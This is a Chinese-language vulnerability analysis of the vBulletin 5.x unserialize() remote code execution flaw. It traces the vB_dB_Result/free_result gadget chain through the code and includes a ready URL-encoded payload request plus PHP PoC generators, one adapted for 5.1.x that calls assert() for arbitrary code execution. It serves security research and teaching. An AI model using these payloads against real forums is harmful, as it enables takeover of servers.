unserialize() 实战之 vBulletin 5.x.x 远程代码执行

Author: RickGray (知道创宇404安全实验室)

近日,vBulletin 的一枚 RCE 利用和简要的分析被曝光,产生漏洞的原因源于 vBulletin 程序在处理 Ajax API 调用的时候,使用unserialize()对传递的参数值进行了反序列化操作,导致攻击者使用精心构造出的 Payload 直接导致代码执行。关于 PHP 中反序列化漏洞的问题可以参考 OWASP 的《PHP Object Injection》

使用原文提供的 Payload 可以直接在受影响的站点上执行phpinfo(1)

具体 Payload 的构造过程也文中有所提及,但是笔者在对 vBulletin 5.1.x 版本进行测试的时候,发现原本的 Payload 并不能成功,甚是疑惑。然而在深入分析后,发现在具体利用的时候还需要结合 vBulletin 程序本身的一些代码结构才能得到一个较为通用的 Payload,通过下面的分析后就能够明白。

0x00 反序列化触发点跟踪


虽然此次漏洞unserialize()函数的触发在曝光的文章中已经描述的很清楚了,并且对整个关键代码的触发流程也进行了说明,但是在深入跟踪和分析时,觉得还是有值得注意和学习的地方。

http://172.16.96.130/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

通过观察服务端在处理PHP时的调用栈,可知服务端在处理上述请求时,会将ajax/api/hook/decodeArguments作为路由参数$_REQUEST['routestring']传递给地址路由处理过程。因其符合ajax/api/[controller]/[method]的 Ajax API 请求路由格式,会再调用vB5_Frontend_ApplicationLight实例中的handleAjaxApi()函数来进行相应的模块加载并调用处理函数:

protected function handleAjaxApi()
{
    $routeInfo = explode('/', $_REQUEST['routestring']);    

    if (count($routeInfo) < 4)
    {
        throw new vB5_Exception_Api('ajax', 'api', array(), 'invalid_request');
    }
    $params = array_merge($_POST, $_GET);
    $this->sendAsJson(Api_InterfaceAbstract::instance(Api_InterfaceAbstract::API_LIGHT)->callApi($routeInfo[2], $routeInfo[3], $params, true));
}

请求的ajax/api/hook/decodeArguments会实例化hook类然后调用decodeArguments()函数,原文中所提及的触发点就在此处:

public function decodeArguments($arguments)
{
    if ($args = @unserialize($arguments))
    {
        $result = '';

        foreach ($args AS $varname => $value)
        {
            $result .= $varname;

通过反序列化,我们可以使之能生成在执行环境上下文中已经定义好了的类实例,并通过寻找一个含有__wakeup()或者__destruct()魔术方法存在问题的类来进行利用。然后原文中所提到的利用方法并不是这样,其使用的是继承于 PHP 迭代器类型的vB_dB_Result类,由于$args = @unserialize($arguments)产生了一个迭代器vB_dB_Result类实例,因此在后面进行foreach操作时会首先调用其rewind()函数。

而在rewind()函数处理过程中,会根据实例变量状态进行调用:

public function rewind()
{
    if ($this->recordset)
    {
        $this->db->free_result($this->recordset);
    }

这里就可以通过反序列化来控制$this->recordset的值,并且$this->db->free_result最终会调用:

function free_result($queryresult)
{
    $this->sql = '';
    return @$this->functions['free_result']($queryresult);
}

$this->functions['free_result']原本的初始化值为mysql_free_result,但是由于反序列化的原因,我们也能控制vB_dB_Result类实例中的db成员,更改其对应的functions['free_result']为我们想要执行的函数,因此一个任意代码执行就产生了。

0x01 利用分析和完善


观察一下原文中提供的 Payload 构造 PoC:

<?php
class vB_Database {
       public $functions = array();
       public function __construct() {
               $this->functions['free_result'] = 'phpinfo';
       }
}    

class vB_dB_Result {
       protected $db;
       protected $recordset;
       public function __construct() {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}    

print urlencode(serialize(new vB_dB_Result())) . "\n";

通过第一部分的分析,我们已经清楚了整个漏洞的函数调用过程和原因,并且也已经得知哪些参数可以得到控制和利用。因此这里我们修改$this->functions['free_result'] = 'assert';$this->recordset = 'var_dump(md5(1))';,最终远程代码执行的的函数则会是assert('var_dump(md5(1))')

这个时候其实 RCE 已经非常的顺利了,但是在进行测试的时候却发现了原文所提供的 PoC 只能复现 5.0.x 版本的 vBulletin,而 5.1.x 版本的却不可以。通过本地搭建测试环境,并使用同样的 PoC 去测试,发现在 5.1.x 版本中vB_Database被定义成了抽象类:

abstract class vB_Database
{
    /**
     * The type of result set to return from the database for a specific row.
     */

抽象类是不能直接进行实例化的,原文提供的 PoC 却是实例化的vB_Database类作为vB_dB_Result迭代器成员db的值,在服务端进行反序列化时会因为需要恢复实例为抽象类而导致失败:

这就是为什么在 5.1.x 版本上 PoC 会不成功的原因。然后要解决这个问题也很容易,通过跟踪调用栈,发现程序在反序列化未定义类时会调用程序注册的autoload()方法去动态加载类文件。这里 vBulletin 会依次调用includes/vb5/autoloader.php中的_autoload方法和core/vb/vb.php中的autoload()方法,成功加载即返回,失败则反序列化失败。所以要想继续使用原有 PoC 的思路来让反序列化后会执行$this->db->free_result($this->recordset);则需要找到一个继承于vB_Database抽象类的子类并且其源码文件路径能够在 autoload 过程中得到加载。

通过搜索,发现有如下类继承于vB_Database抽象类及其源码对应的路径:

而终代码进行进行 autoload 的时候会解析传递的类名来动态构造尝试加载的源码文件路径:

...省略
    $fname = str_replace('_', '/', strtolower($class)) . '.php';    

    foreach (self::$_paths AS $path)
    {
        if (file_exists($path . $fname))
        {
            include($path . $fname);
            if (class_exists($class, false))
            {
                return true;
            }

上面这段代码存在于第一次调用的__autoload()里,可以看到对提供的类名以_进行了拆分,动态构造了加载路径(第二次 autoload() 的过程大致相同),简单分析一下就可以发现只有在反序列化vB_Database_MySQLvB_Database_MySQLi这两个基于vB_Database抽象类的子类时,才能成功的动态加载其类定义所在的源码文件使得反序列化成功执行,最终才能控制参数进行任意代码执行。

所以,针对 5.1.x 版本 vBulletin 的 PoC 就可以得到了,使用vB_Database_MySQL或者vB_Database_MySQLi作为迭代器vB_dB_Result成员db的值即可。具体 PoC 如下:

<?php
class vB_Database_MySQL {
       public $functions = array();
       public function __construct() {
               $this->functions['free_result'] = 'assert';
       }
}    

class vB_dB_Result {
       protected $db;
       protected $recordset;
       public function __construct() {
               $this->db = new vB_Database_MySQL();
               $this->recordset = 'print("This Vuln In 5.1.7")';
       }
}    

print urlencode(serialize(new vB_dB_Result())) . "\n";

测试一下,成功执行assert('print("This Vuln In 5.1.7")')

当然了,PoC 不止上面所提供的这一种写法,仅供参考而已。

0x02 小结


此次 vBulletin 5.x.x RCE 漏洞的曝光,从寻找触发点到对象的寻找,再到各种自动加载细节,不得不说是一个很好的 PHP 反序列化漏洞实战实例。不仔细去分析真的不能发现原作者清晰的思路和对程序的熟悉程度。

另外,Check Point在其官方博客上也公布了反序列化的另一个利用点,通过反序列化出一个模版对象最终调用eval()函数进行执行(原文)。

0x03 参考


原文出处:http://blog.knownsec.com/2015/11/unserialize-exploit-with-vbulletin-5-x-x-remote-code-execution/

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐